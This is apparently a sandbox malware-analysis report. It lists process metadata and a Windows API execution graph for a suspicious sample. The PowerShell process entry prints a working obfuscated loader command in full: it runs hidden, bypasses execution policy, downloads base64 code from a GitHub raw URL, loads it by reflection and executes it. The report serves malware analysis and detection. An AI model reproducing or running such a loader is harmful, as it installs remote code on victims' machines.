                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Target ID:59
                                                                                                        Start time:20:16:14
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
                                                                                                        Imagebase:0x7ff7be880000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:5.2%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:8.2%
                                                                                                          Total number of Nodes:708
                                                                                                          Total number of Limit Nodes:85
                                                                                                          execution_graph 34761 7ff7a178731e 34762 7ff7a1787328 34761->34762 34765 7ff7a1787330 34761->34765 34773 7ff7a1787de0 CloseHandle 34762->34773 34764 7ff7a178737a 34769 7ff7a17873a9 34764->34769 34774 7ff7a1787de0 CloseHandle 34764->34774 34765->34764 34770 7ff7a1787375 34765->34770 34778 7ff7a1787850 CloseHandle NtCancelIoFileEx RtlNtStatusToDosError 34765->34778 34772 7ff7a17873fc 34769->34772 34775 7ff7a1787e90 CloseHandle 34769->34775 34770->34764 34777 7ff7a1787850 CloseHandle NtCancelIoFileEx RtlNtStatusToDosError 34770->34777 34773->34765 34774->34769 34776 7ff7a1787ea8 34775->34776 34776->34769 34777->34770 34778->34765 34779 7ff7a1789860 34780 7ff7a1789720 memset 34779->34780 34781 7ff7a17897f5 34779->34781 34782 7ff7a1789749 34780->34782 34782->34779 34782->34781 34783 7ff7a17a2ae2 34786 7ff7a17bb760 34783->34786 34785 7ff7a17a2aea 34787 7ff7a17bb877 34786->34787 34798 7ff7a17bb780 34786->34798 34800 7ff7a17e8270 WaitOnAddress GetLastError 34787->34800 34789 7ff7a17bb976 34792 7ff7a17bb9a6 34789->34792 34801 7ff7a1834860 WaitOnAddress GetLastError WakeByAddressSingle 34789->34801 34802 7ff7a17bbf30 memmove 34792->34802 34793 7ff7a17bbaa4 34799 7ff7a17bbaaa 34793->34799 34803 7ff7a1834860 WaitOnAddress GetLastError WakeByAddressSingle 34793->34803 34796 7ff7a17bbac7 34804 7ff7a1834860 WaitOnAddress GetLastError WakeByAddressSingle 34796->34804 34798->34799 34805 7ff7a17bbf30 memmove 34798->34805 34799->34785 34799->34799 34800->34789 34801->34792 34802->34793 34803->34796 34804->34798 34805->34798 35239 7ff7a179f6c2 35241 7ff7a179f680 35239->35241 35240 7ff7a179f78c 35241->35240 35242 7ff7a179f804 35241->35242 35243 7ff7a179f818 35241->35243 35244 7ff7a179f81f 35242->35244 35245 7ff7a179f80b 35242->35245 35243->35244 35246 7ff7a179f85a 35243->35246 35248 7ff7a179f835 memmove 35244->35248 35252 7ff7a179f867 35244->35252 35314 7ff7a17ba340 7 API calls 35245->35314 35315 7ff7a17ba210 7 API calls 35246->35315 35250 7ff7a179f816 35248->35250 35251 7ff7a179f8d8 35252->35251 35255 7ff7a179d7d7 35252->35255 35253 7ff7a179f8a9 35256 7ff7a179d835 35255->35256 35258 7ff7a179d808 35255->35258 35257 7ff7a179d8de RegOpenKeyExW 35256->35257 35259 7ff7a179d921 35257->35259 35258->35253 35261 7ff7a179d94f 35259->35261 35316 7ff7a17ded40 35259->35316 35263 7ff7a1816350 RegCloseKey 35261->35263 35306 7ff7a179e07e 35261->35306 35262 7ff7a179d99b 35264 7ff7a179da05 35262->35264 35265 7ff7a17ded40 RegQueryValueExW 35262->35265 35269 7ff7a179da55 35263->35269 35264->35306 35321 7ff7a1816350 35264->35321 35267 7ff7a179d9f7 35265->35267 35267->35264 35324 7ff7a1816370 memmove memmove memmove 35267->35324 35271 7ff7a179db6c ProcessPrng 35269->35271 35275 7ff7a179dac7 35269->35275 35270 7ff7a179daed 35270->35264 35272 7ff7a179db1e 35270->35272 35271->35275 35273 7ff7a1816350 RegCloseKey 35272->35273 35274 7ff7a179db50 35273->35274 35276 7ff7a1816350 RegCloseKey 35274->35276 35278 7ff7a179dc50 35275->35278 35282 7ff7a179dc58 35275->35282 35325 7ff7a17a1b30 14 API calls 35275->35325 35276->35269 35278->35282 35326 7ff7a17a1b30 14 API calls 35278->35326 35281 7ff7a179de25 35284 7ff7a179de29 35281->35284 35328 7ff7a17a1b30 14 API calls 35281->35328 35282->35281 35327 7ff7a17a1b30 14 API calls 35282->35327 35286 7ff7a179df2e 35284->35286 35329 7ff7a17a1b30 14 API calls 35284->35329 35288 7ff7a179df91 35286->35288 35291 7ff7a179df32 35286->35291 35331 7ff7a17a1b30 14 API calls 35286->35331 35288->35291 35332 7ff7a17a1b30 14 API calls 35288->35332 35290 7ff7a179dee5 35290->35286 35330 7ff7a17a1b30 14 API calls 35290->35330 35293 7ff7a179e0d5 ProcessPrng 35291->35293 35295 7ff7a179e06a 35291->35295 35291->35306 35293->35295 35294 7ff7a179e14e 35333 7ff7a17a21e0 memcmp 35294->35333 35295->35294 35296 7ff7a179e1ac 35295->35296 35335 7ff7a18c8ab0 memcmp 35296->35335 35299 7ff7a179e162 35300 7ff7a179e485 35299->35300 35301 7ff7a179e16b 35299->35301 35339 7ff7a17a1b30 14 API calls 35300->35339 35334 7ff7a18bf2c0 memmove 35301->35334 35305 7ff7a179e186 35340 7ff7a17a1b30 14 API calls 35305->35340 35306->35253 35308 7ff7a179e63a 35341 7ff7a17cf470 memset 35308->35341 35311 7ff7a179e415 memmove 35312 7ff7a179e1d2 35311->35312 35312->35306 35312->35308 35312->35311 35336 7ff7a18c8ab0 memcmp 35312->35336 35337 7ff7a17a21e0 memcmp 35312->35337 35338 7ff7a17a1b30 14 API calls 35312->35338 35314->35250 35315->35250 35317 7ff7a17ded83 35316->35317 35318 7ff7a17deeda 35317->35318 35319 7ff7a17dedf0 RegQueryValueExW 35317->35319 35318->35262 35319->35317 35320 7ff7a17dee2e 35319->35320 35320->35262 35322 7ff7a1816362 35321->35322 35323 7ff7a1816363 RegCloseKey 35321->35323 35322->35261 35324->35270 35325->35278 35326->35282 35327->35281 35328->35284 35329->35290 35330->35286 35331->35288 35332->35291 35333->35299 35334->35305 35335->35312 35336->35312 35337->35312 35338->35312 35339->35305 35340->35306 35341->35306 34806 7ff7a18aa130 GetFileInformationByHandle 34807 7ff7a18aa214 GetLastError 34806->34807 34808 7ff7a18aa16d 34806->34808 34809 7ff7a18aa19e 34807->34809 34808->34809 34810 7ff7a18aa17a GetFileInformationByHandleEx 34808->34810 34810->34807 34810->34809 34811 7ff7a178ade3 34813 7ff7a178ad90 34811->34813 34812 7ff7a178b7c7 34829 7ff7a178a990 34812->34829 34813->34812 34816 7ff7a1865c60 QueryPerformanceFrequency GetLastError 34813->34816 34817 7ff7a178b790 34813->34817 34820 7ff7a178ae09 memmove memmove 34813->34820 34822 7ff7a178b6b3 34813->34822 34824 7ff7a178b0ff memmove 34813->34824 34827 7ff7a178b19a memmove 34813->34827 34828 7ff7a178b291 memmove 34813->34828 34837 7ff7a189f0b0 WaitOnAddress GetLastError WaitOnAddress GetLastError 34813->34837 34816->34813 34818 7ff7a178bb17 34821 7ff7a178aa60 2 API calls 34818->34821 34819 7ff7a178b76e 34819->34817 34826 7ff7a178a990 2 API calls 34819->34826 34820->34813 34821->34817 34822->34818 34822->34819 34823 7ff7a178b8a4 34833 7ff7a178aa60 34823->34833 34824->34813 34826->34817 34827->34813 34828->34813 34830 7ff7a178a9a2 34829->34830 34832 7ff7a178aa0f 34830->34832 34838 7ff7a1787520 CloseHandle CloseHandle 34830->34838 34832->34823 34834 7ff7a178aa74 34833->34834 34834->34817 34835 7ff7a178ab1b 34834->34835 34836 7ff7a178a990 2 API calls 34834->34836 34836->34835 34837->34813 34838->34832 35342 7ff7a1781bf8 35343 7ff7a18ad530 memmove 35342->35343 35344 7ff7a1781c06 35343->35344 35347 7ff7a18ad640 35344->35347 35346 7ff7a1781c14 35349 7ff7a18ad65c 35347->35349 35348 7ff7a18ad68d memmove 35350 7ff7a18ad6a9 35348->35350 35349->35348 35351 7ff7a18ad6d5 35349->35351 35350->35346 34839 7ff7a1823af0 34855 7ff7a1874010 34839->34855 34845 7ff7a1823c75 34852 7ff7a1823b57 34845->34852 34866 7ff7a18740c0 bind 34845->34866 34846 7ff7a1823f04 closesocket 34846->34852 34849 7ff7a1823bf3 34849->34846 34849->34852 34853 7ff7a1823f45 34853->34852 34854 7ff7a182413c 34853->34854 34872 7ff7a1871ae0 setsockopt GetLastError 34853->34872 34854->34852 34873 7ff7a1871af0 setsockopt GetLastError 34854->34873 34856 7ff7a187402c WSASocketW 34855->34856 34858 7ff7a1874078 34855->34858 34857 7ff7a1874059 34856->34857 34860 7ff7a1823b4b 34856->34860 34874 7ff7a18ab130 GetLastError 34857->34874 34858->34856 34860->34852 34861 7ff7a1874140 ioctlsocket 34860->34861 34862 7ff7a187416a 34861->34862 34863 7ff7a1823bee 34861->34863 34875 7ff7a18ab130 GetLastError 34862->34875 34863->34845 34863->34849 34871 7ff7a1874270 setsockopt WSAIoctl GetLastError 34863->34871 34867 7ff7a1823ea1 34866->34867 34868 7ff7a18740d8 34866->34868 34867->34849 34867->34853 34876 7ff7a18ab130 GetLastError 34868->34876 34871->34845 34872->34854 34873->34852 35352 7ff7a17a31b9 memmove 35353 7ff7a17a31d6 35352->35353 35354 7ff7a17a31fc 35353->35354 35356 7ff7a17b9620 memmove 35353->35356 35357 7ff7a17b9677 memmove 35356->35357 35363 7ff7a17b965b 35356->35363 35364 7ff7a17f66e0 35357->35364 35359 7ff7a17b9980 memmove 35360 7ff7a17b9a26 35359->35360 35361 7ff7a17b9a2f memmove 35360->35361 35360->35363 35361->35363 35362 7ff7a17b969a 35362->35359 35362->35363 35363->35354 35367 7ff7a17fc6f0 35364->35367 35365 7ff7a17f6702 35365->35362 35368 7ff7a17fc723 35367->35368 35371 7ff7a17fc72e 35368->35371 35372 7ff7a181e9c0 35368->35372 35370 7ff7a17fca3d 35370->35365 35371->35365 35373 7ff7a181e9eb 35372->35373 35377 7ff7a181ea24 35373->35377 35378 7ff7a186feb0 35373->35378 35375 7ff7a181ea17 35386 7ff7a186fe80 35375->35386 35377->35370 35379 7ff7a186febc 35378->35379 35382 7ff7a186fed1 35378->35382 35391 7ff7a1876310 getpeername WSAGetLastError 35379->35391 35381 7ff7a186fec8 35381->35375 35383 7ff7a18a2e10 setsockopt 35382->35383 35384 7ff7a18a2e45 35383->35384 35385 7ff7a18a2e4d WSAGetLastError 35383->35385 35384->35375 35385->35375 35387 7ff7a186fe8c 35386->35387 35388 7ff7a186fea1 35386->35388 35392 7ff7a1876330 35387->35392 35391->35381 35395 7ff7a18a2fb0 35392->35395 35398 7ff7a18b6df0 getsockname 35395->35398 35399 7ff7a18b6e7a WSAGetLastError 35398->35399 35400 7ff7a18b6e47 35398->35400 35401 7ff7a186fe98 35399->35401 35400->35401 35402 7ff7a18b6f49 35400->35402 35416 7ff7a18d7630 35400->35416 35401->35377 35408 7ff7a18ab030 WSASocketW 35402->35408 35406 7ff7a18b6f9c bind 35406->35401 35407 7ff7a18b6fd9 WSAGetLastError closesocket 35406->35407 35407->35401 35409 7ff7a18ab104 35408->35409 35410 7ff7a18ab082 WSAGetLastError 35408->35410 35409->35401 35409->35406 35411 7ff7a18ab08f 35410->35411 35412 7ff7a18ab098 WSASocketW 35410->35412 35411->35409 35411->35412 35413 7ff7a18ab0bf SetHandleInformation 35412->35413 35414 7ff7a18ab0fc WSAGetLastError 35412->35414 35413->35409 35415 7ff7a18ab0d9 GetLastError closesocket 35413->35415 35414->35409 35415->35409 35417 7ff7a18d7645 35416->35417 35418 7ff7a18d764b 35416->35418 35417->35402 35421 7ff7a18d7920 35418->35421 35422 7ff7a18d7990 35421->35422 35423 7ff7a18d7afc WakeByAddressAll 35422->35423 35424 7ff7a18d766f 35422->35424 35423->35424 35424->35402 34877 7ff7a1863cf0 34880 7ff7a1876300 CloseHandle 34877->34880 35425 7ff7a17a353c 35426 7ff7a17a354d 35425->35426 35438 7ff7a181a740 35426->35438 35428 7ff7a17a35db 35443 7ff7a181a830 35428->35443 35430 7ff7a17a360b 35447 7ff7a181a3f0 35430->35447 35432 7ff7a17a3707 35433 7ff7a17a38c0 memmove 35432->35433 35434 7ff7a17a3867 35432->35434 35437 7ff7a17a38de 35433->35437 35435 7ff7a17a3898 memmove 35434->35435 35436 7ff7a17a387d memmove 35434->35436 35435->35437 35436->35435 35439 7ff7a181a756 35438->35439 35440 7ff7a181a787 memmove 35439->35440 35441 7ff7a181a7d4 35439->35441 35442 7ff7a181a7a5 35440->35442 35442->35428 35444 7ff7a181a895 35443->35444 35445 7ff7a181aa72 AcquireCredentialsHandleA 35444->35445 35446 7ff7a181aabb 35444->35446 35445->35446 35446->35430 35448 7ff7a181a40e 35447->35448 35449 7ff7a181a402 CertCloseStore 35447->35449 35448->35432 35449->35448 34881 7ff7a1781c21 34882 7ff7a1781c71 34881->34882 34884 7ff7a1781c3a 34881->34884 34883 7ff7a1781110 3 API calls 34882->34883 34885 7ff7a1781c6c 34883->34885 34884->34885 34887 7ff7a1781110 34884->34887 34888 7ff7a1781124 34887->34888 34889 7ff7a17811db 34888->34889 34890 7ff7a17811d1 CloseHandle 34888->34890 34891 7ff7a17811f2 34889->34891 34892 7ff7a17811e8 CloseHandle 34889->34892 34890->34889 34893 7ff7a178120c 34891->34893 34894 7ff7a17811ff CloseHandle 34891->34894 34892->34891 34893->34885 34894->34893 35450 7ff7a17a9f3b 35453 7ff7a18972b0 35450->35453 35452 7ff7a17a9f46 35454 7ff7a18972d7 35453->35454 35455 7ff7a18972ce 35453->35455 35457 7ff7a1897316 memmove 35454->35457 35462 7ff7a1897340 35454->35462 35455->35454 35456 7ff7a189737e 35455->35456 35458 7ff7a18973d4 35456->35458 35459 7ff7a1897388 35456->35459 35457->35462 35461 7ff7a1897459 memmove 35458->35461 35458->35462 35460 7ff7a18973b7 memmove 35459->35460 35459->35462 35460->35462 35461->35462 35462->35452 35463 7ff7a1796590 35464 7ff7a17965bf memset 35463->35464 35465 7ff7a17965cd 35463->35465 35464->35465 35467 7ff7a17965ea 35465->35467 35468 7ff7a17fd710 35465->35468 35469 7ff7a17fd747 35468->35469 35470 7ff7a17fd8e2 35469->35470 35472 7ff7a17fd923 35469->35472 35474 7ff7a17fd7ea memset 35469->35474 35476 7ff7a179b9e0 35469->35476 35480 7ff7a1803050 DecryptMessage 35469->35480 35471 7ff7a17fd8f8 memmove 35470->35471 35470->35472 35471->35472 35472->35467 35474->35469 35477 7ff7a179ba08 35476->35477 35479 7ff7a179ba0d 35476->35479 35477->35479 35481 7ff7a1796720 35477->35481 35479->35469 35482 7ff7a179675a 35481->35482 35491 7ff7a1796834 35482->35491 35514 7ff7a17fd440 35482->35514 35485 7ff7a17968e6 35522 7ff7a1897710 7 API calls 35485->35522 35487 7ff7a17968fe 35523 7ff7a1897710 7 API calls 35487->35523 35489 7ff7a1796916 35524 7ff7a1897710 7 API calls 35489->35524 35490 7ff7a1796b8b 35493 7ff7a1796bab memmove 35490->35493 35491->35490 35521 7ff7a1897710 7 API calls 35491->35521 35496 7ff7a1796bf1 35493->35496 35501 7ff7a1796c74 35493->35501 35494 7ff7a1796931 35525 7ff7a1897710 7 API calls 35494->35525 35498 7ff7a1796bfe memmove 35496->35498 35497 7ff7a179694d 35526 7ff7a1897710 7 API calls 35497->35526 35500 7ff7a1796c3e 35498->35500 35507 7ff7a1796c5c 35498->35507 35503 7ff7a1796d54 memmove 35500->35503 35500->35507 35501->35500 35502 7ff7a1796ca2 memmove 35501->35502 35502->35500 35502->35507 35504 7ff7a1796e10 35503->35504 35505 7ff7a1796da7 35503->35505 35508 7ff7a1796e1b memmove 35504->35508 35505->35507 35511 7ff7a1796de6 memmove 35505->35511 35506 7ff7a1796969 35509 7ff7a1796a05 35506->35509 35510 7ff7a17969e3 memmove 35506->35510 35512 7ff7a18972b0 3 API calls 35506->35512 35507->35479 35508->35507 35509->35479 35510->35490 35510->35509 35511->35507 35513 7ff7a17969df 35512->35513 35513->35510 35519 7ff7a17fd475 35514->35519 35515 7ff7a17fd63d 35517 7ff7a17fd651 memmove 35515->35517 35520 7ff7a17fd679 35515->35520 35517->35520 35518 7ff7a17fd511 memset 35518->35519 35519->35515 35519->35518 35519->35520 35527 7ff7a1801df0 35519->35527 35520->35491 35521->35485 35522->35487 35523->35489 35524->35494 35525->35497 35526->35506 35539 7ff7a1801e54 35527->35539 35529 7ff7a1802a2e CertGetCertificateChain 35530 7ff7a1802f31 35529->35530 35529->35539 35553 7ff7a18ab130 GetLastError 35530->35553 35533 7ff7a1802d0d CertVerifyCertificateChainPolicy 35536 7ff7a1802f43 35533->35536 35533->35539 35554 7ff7a18ab130 GetLastError 35536->35554 35538 7ff7a1802313 FreeContextBuffer 35538->35539 35539->35529 35539->35533 35539->35538 35540 7ff7a18023f6 InitializeSecurityContextW 35539->35540 35541 7ff7a1802a13 35539->35541 35542 7ff7a181acc0 35539->35542 35549 7ff7a181a6f0 QueryContextAttributesW 35539->35549 35551 7ff7a181a1e0 CertDuplicateStore 35539->35551 35552 7ff7a181af60 FreeContextBuffer 35539->35552 35540->35538 35540->35539 35541->35519 35546 7ff7a181acde 35542->35546 35543 7ff7a181adf3 memmove 35544 7ff7a181ae45 35543->35544 35543->35546 35545 7ff7a181ad87 35544->35545 35547 7ff7a181aec7 memmove 35544->35547 35546->35543 35546->35544 35546->35545 35548 7ff7a181aef7 35547->35548 35548->35539 35550 7ff7a181a718 35549->35550 35550->35539 35551->35539 35555 7ff7a18b2880 35556 7ff7a18b289d 35555->35556 35557 7ff7a18b28fd GetFileAttributesW 35556->35557 35558 7ff7a18b28b4 35556->35558 35557->35558 34895 7ff7a179a5b6 34896 7ff7a179a488 34895->34896 34899 7ff7a179a6f4 34896->34899 34900 7ff7a181e6d0 memmove 34896->34900 34898 7ff7a179a495 34900->34898 35559 7ff7a17a3788 35560 7ff7a17a3790 35559->35560 35561 7ff7a17a3995 35560->35561 35562 7ff7a17a37b2 35560->35562 35563 7ff7a181a740 memmove 35561->35563 35564 7ff7a17a38c0 memmove 35562->35564 35565 7ff7a17a3867 35562->35565 35569 7ff7a17a3a1b 35563->35569 35573 7ff7a17a38de 35564->35573 35567 7ff7a17a3898 memmove 35565->35567 35568 7ff7a17a387d memmove 35565->35568 35566 7ff7a181a830 AcquireCredentialsHandleA 35572 7ff7a17a3a4b 35566->35572 35567->35573 35568->35567 35569->35566 35570 7ff7a17a3bd2 35575 7ff7a17a3beb DeleteSecurityContext 35570->35575 35588 7ff7a17dbfe0 FreeCredentialsHandle 35570->35588 35571 7ff7a17a3af8 35580 7ff7a17a6dc0 35571->35580 35572->35570 35572->35571 35577 7ff7a17a3bfd 35575->35577 35578 7ff7a17a6dc0 6 API calls 35577->35578 35579 7ff7a17a3b04 35578->35579 35581 7ff7a17a6dcf 35580->35581 35582 7ff7a17a6e21 closesocket 35581->35582 35585 7ff7a17a6e2a 35581->35585 35589 7ff7a1876630 NtCancelIoFileEx RtlNtStatusToDosError WaitOnAddress GetLastError 35581->35589 35582->35585 35584 7ff7a17a6dea 35586 7ff7a17a6e0e 35584->35586 35590 7ff7a1787850 CloseHandle NtCancelIoFileEx RtlNtStatusToDosError 35584->35590 35585->35579 35586->35582 35588->35575 35589->35584 35590->35586 35591 7ff7a17819d5 35599 7ff7a17818d0 35591->35599 35592 7ff7a189efa0 6 API calls 35592->35599 35593 7ff7a17819e2 35594 7ff7a18be730 memmove 35593->35594 35595 7ff7a17819f3 35594->35595 35596 7ff7a17819b0 memmove 35597 7ff7a1781a1d 35596->35597 35598 7ff7a189ff10 6 API calls 35597->35598 35600 7ff7a1781a68 35598->35600 35599->35591 35599->35592 35599->35593 35599->35596 35601 7ff7a1781ad1 35602 7ff7a1781adb CloseHandle 35601->35602 35603 7ff7a1781ae6 35602->35603 34901 7ff7a1783670 34904 7ff7a189e830 AddVectoredExceptionHandler SetThreadStackGuarantee 34901->34904 34903 7ff7a178369c 34905 7ff7a18da0b8 34904->34905 34906 7ff7a189e876 SetThreadDescription 34905->34906 34907 7ff7a189e89b 34906->34907 34910 7ff7a17891d0 34907->34910 34908 7ff7a189e8a9 34908->34903 34915 7ff7a1788030 34910->34915 34914 7ff7a1789242 34914->34908 34923 7ff7a1782bee 34915->34923 34965 7ff7a1782023 memmove 34915->34965 35008 7ff7a1781e23 34915->35008 35054 7ff7a1782786 34915->35054 35082 7ff7a1782957 34915->35082 34916 7ff7a1788036 34916->34914 34922 7ff7a18a1900 WakeByAddressSingle WakeByAddressSingle WaitOnAddress GetLastError 34916->34922 34922->34914 34925 7ff7a1782c0d 34923->34925 35124 7ff7a189ff30 34925->35124 34926 7ff7a1782c75 34938 7ff7a1782c82 34926->34938 35130 7ff7a1789a00 34926->35130 34928 7ff7a1782d17 35133 7ff7a18a5890 34928->35133 34931 7ff7a1782d44 35138 7ff7a1789690 34931->35138 34933 7ff7a1782e19 34934 7ff7a1782e49 34933->34934 34935 7ff7a17830f6 34933->34935 34933->34938 34937 7ff7a18a11b0 WakeByAddressAll 34934->34937 34940 7ff7a1783118 CloseHandle 34935->34940 34944 7ff7a1782ab4 34935->34944 34936 7ff7a1781fc0 34936->34916 34939 7ff7a1782e4e 34937->34939 34938->34944 34959 7ff7a178305a 34938->34959 34941 7ff7a1782e6c CloseHandle 34939->34941 34939->34944 34940->34938 34942 7ff7a1782957 34941->34942 34942->34938 34942->34944 34964 7ff7a1782af4 34942->34964 35109 7ff7a18a11b0 34942->35109 34944->34916 34944->34944 34946 7ff7a1781faa 34946->34936 34947 7ff7a17829a9 34947->34944 35113 7ff7a1789a50 34947->35113 34948 7ff7a1782fc6 35142 7ff7a1788d10 CloseHandle 34948->35142 34952 7ff7a1782a01 34953 7ff7a1783028 34952->34953 34954 7ff7a1782a2f 34952->34954 34953->34944 34957 7ff7a1783047 34953->34957 34955 7ff7a1781110 3 API calls 34954->34955 34956 7ff7a1782a5c 34955->34956 34956->34938 34960 7ff7a1782a79 34956->34960 34958 7ff7a1781110 3 API calls 34957->34958 34958->34959 35143 7ff7a1788910 CloseHandle 34959->35143 34960->34944 34961 7ff7a1782abe memmove 34960->34961 34962 7ff7a1782aef 34961->34962 34963 7ff7a18a11b0 WakeByAddressAll 34962->34963 34963->34964 34964->34944 34964->34948 35159 7ff7a178c4c0 memmove 34965->35159 34967 7ff7a1782051 34968 7ff7a178c690 BCryptGenRandom SystemFunction036 34967->34968 34978 7ff7a1781f93 34967->34978 34969 7ff7a178219b 34968->34969 34970 7ff7a17885c0 BCryptGenRandom SystemFunction036 34969->34970 34971 7ff7a17821be 34970->34971 34972 7ff7a189efa0 6 API calls 34971->34972 34973 7ff7a17821c8 34972->34973 34974 7ff7a18a5890 memmove 34973->34974 34975 7ff7a178222b 34974->34975 34976 7ff7a1789a50 memmove 34975->34976 34975->34978 34977 7ff7a1782489 34976->34977 34979 7ff7a17824ed CloseHandle CloseHandle 34977->34979 34978->34916 34978->34978 34980 7ff7a178254d 34979->34980 34981 7ff7a1781110 CloseHandle CloseHandle CloseHandle 34980->34981 34982 7ff7a1782582 34981->34982 34983 7ff7a1781d20 8 API calls 34982->34983 34985 7ff7a178270a 34983->34985 34984 7ff7a1788d10 CloseHandle 35001 7ff7a1782fde 34984->35001 34985->34978 34986 7ff7a18a11b0 WakeByAddressAll 34985->34986 35007 7ff7a1782af4 34985->35007 34988 7ff7a17829a9 34986->34988 34987 7ff7a1782fc6 34987->34984 34988->34978 34989 7ff7a1789a50 memmove 34988->34989 34990 7ff7a17829e6 34989->34990 34991 7ff7a18ad6f0 CloseHandle 34990->34991 34992 7ff7a1782a01 34991->34992 34993 7ff7a1783028 34992->34993 34994 7ff7a1782a2f 34992->34994 34993->34978 34997 7ff7a1783047 34993->34997 34995 7ff7a1781110 CloseHandle CloseHandle CloseHandle 34994->34995 34996 7ff7a1782a5c 34995->34996 35000 7ff7a178306b 34996->35000 35003 7ff7a1782a79 34996->35003 34998 7ff7a1781110 CloseHandle CloseHandle CloseHandle 34997->34998 35002 7ff7a178305a 34998->35002 34999 7ff7a1788910 CloseHandle 34999->35001 35000->34978 35000->35002 35001->34978 35002->34999 35003->34978 35004 7ff7a1782abe memmove 35003->35004 35005 7ff7a1782aef 35004->35005 35006 7ff7a18a11b0 WakeByAddressAll 35005->35006 35006->35007 35007->34978 35007->34987 35009 7ff7a1781e31 35008->35009 35021 7ff7a1781fa4 35008->35021 35010 7ff7a1781fe2 memmove 35009->35010 35009->35021 35011 7ff7a17820ad 35010->35011 35161 7ff7a18be730 35011->35161 35013 7ff7a17820be 35013->35021 35165 7ff7a178c690 35013->35165 35015 7ff7a178219b 35169 7ff7a17885c0 35015->35169 35020 7ff7a18a5890 memmove 35022 7ff7a178222b 35020->35022 35021->34916 35022->35021 35023 7ff7a1789a50 memmove 35022->35023 35024 7ff7a1782489 35023->35024 35025 7ff7a17824ed CloseHandle CloseHandle 35024->35025 35026 7ff7a178254d 35025->35026 35027 7ff7a1781110 3 API calls 35026->35027 35028 7ff7a1782582 35027->35028 35185 7ff7a1781d20 35028->35185 35030 7ff7a1782fc6 35192 7ff7a1788d10 CloseHandle 35030->35192 35032 7ff7a178270a 35032->35021 35033 7ff7a18a11b0 WakeByAddressAll 35032->35033 35052 7ff7a1782af4 35032->35052 35034 7ff7a17829a9 35033->35034 35034->35021 35035 7ff7a1789a50 memmove 35034->35035 35036 7ff7a17829e6 35035->35036 35037 7ff7a18ad6f0 CloseHandle 35036->35037 35038 7ff7a1782a01 35037->35038 35039 7ff7a1783028 35038->35039 35040 7ff7a1782a2f 35038->35040 35039->35021 35043 7ff7a1783047 35039->35043 35041 7ff7a1781110 3 API calls 35040->35041 35042 7ff7a1782a5c 35041->35042 35046 7ff7a178306b 35042->35046 35048 7ff7a1782a79 35042->35048 35044 7ff7a1781110 3 API calls 35043->35044 35047 7ff7a178305a 35044->35047 35046->35021 35046->35047 35193 7ff7a1788910 CloseHandle 35047->35193 35048->35021 35049 7ff7a1782abe memmove 35048->35049 35050 7ff7a1782aef 35049->35050 35051 7ff7a18a11b0 WakeByAddressAll 35050->35051 35051->35052 35052->35021 35052->35030 35053 7ff7a1782fde 35053->35021 35056 7ff7a17827c7 35054->35056 35057 7ff7a17828db 35054->35057 35056->35054 35056->35057 35069 7ff7a1782ab4 35056->35069 35207 7ff7a178bc80 35056->35207 35060 7ff7a18a11b0 WakeByAddressAll 35057->35060 35057->35069 35080 7ff7a1782af4 35057->35080 35058 7ff7a1782fc6 35217 7ff7a1788d10 CloseHandle 35058->35217 35061 7ff7a17829a9 35060->35061 35062 7ff7a1789a50 memmove 35061->35062 35061->35069 35063 7ff7a17829e6 35062->35063 35064 7ff7a18ad6f0 CloseHandle 35063->35064 35065 7ff7a1782a01 35064->35065 35066 7ff7a1783028 35065->35066 35067 7ff7a1782a2f 35065->35067 35066->35069 35071 7ff7a1783047 35066->35071 35068 7ff7a1781110 3 API calls 35067->35068 35070 7ff7a1782a5c 35068->35070 35069->34916 35069->35069 35074 7ff7a178306b 35070->35074 35076 7ff7a1782a79 35070->35076 35072 7ff7a1781110 3 API calls 35071->35072 35075 7ff7a178305a 35072->35075 35074->35069 35074->35075 35218 7ff7a1788910 CloseHandle 35075->35218 35076->35069 35077 7ff7a1782abe memmove 35076->35077 35078 7ff7a1782aef 35077->35078 35079 7ff7a18a11b0 WakeByAddressAll 35078->35079 35079->35080 35080->35058 35080->35069 35081 7ff7a1781faa 35081->34916 35083 7ff7a1782974 35082->35083 35107 7ff7a1782af4 35082->35107 35086 